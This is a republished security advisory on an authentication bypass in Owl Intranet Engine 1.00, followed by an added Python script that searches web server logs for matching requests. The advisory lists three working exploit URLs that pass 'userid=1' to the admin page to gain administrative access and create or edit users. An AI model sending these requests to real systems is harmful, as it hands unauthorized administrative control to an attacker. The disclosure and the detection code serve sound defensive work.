Owl Intranet Engine 1.00 – ‘userid’ Authentication Bypass

  • Author: RedTeam Pentesting GmbH
    Date: 2011-12-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36456/
  • source: https://www.securityfocus.com/bid/51076/info
    
    Owl Intranet Engine is prone to an authentication-bypass vulnerability.
    
    An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
    
    Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. 
    
    http://www.example.org/owl/admin/index.php?userid=1
    http://www.example.org/owl/admin/index.php?userid=1&newuser
    http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1
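
To check whether a deployment has received requests of this shape, the added example below (not part of the original advisory) scans web server access logs for requests to admin/index.php that carry a userid query parameter. It assumes Apache/nginx "combined" log format; the log lines, IP addresses and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [15/Dec/2011:10:00:01 +0000] "GET /owl/admin/index.php?userid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [15/Dec/2011:10:00:05 +0000] "GET /owl/admin/index.php?userid=1&newuser HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.0.2.10 - - [15/Dec/2011:10:00:09 +0000] "GET /owl/admin/index.php?userid=1&action=edituser&owluser=1 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Dec/2011:10:02:44 +0000] "GET /owl/browse.php?parent=3 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Dec/2011:10:03:12 +0000] "GET /owl/admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Assumption: the server writes Apache/nginx "combined" access logs.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_userid_admin_requests(log_text):
    """Return requests to admin/index.php whose query string carries 'userid'."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m.group("target"))
        # Decode the path so percent-encoded spellings of the script name still match.
        if not unquote(url.path).lower().endswith("/admin/index.php"):
            continue
        # parse_qs percent-decodes names; keep_blank_values keeps flags like 'newuser'.
        params = parse_qs(url.query, keep_blank_values=True)
        if "userid" not in params:
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "userid": params["userid"],
            "other_params": sorted(k for k in params if k != "userid"),
        })
    return hits

if __name__ == "__main__":
    for hit in find_userid_admin_requests(SAMPLE_LOG):
        print(hit)
```

Each hit records the response status and the accompanying parameters so that requests such as newuser or action=edituser can be prioritised during review.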